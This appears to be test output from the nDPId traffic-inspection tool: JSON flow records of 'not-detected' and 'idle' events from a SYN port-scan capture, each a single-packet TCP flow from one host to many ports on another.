+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 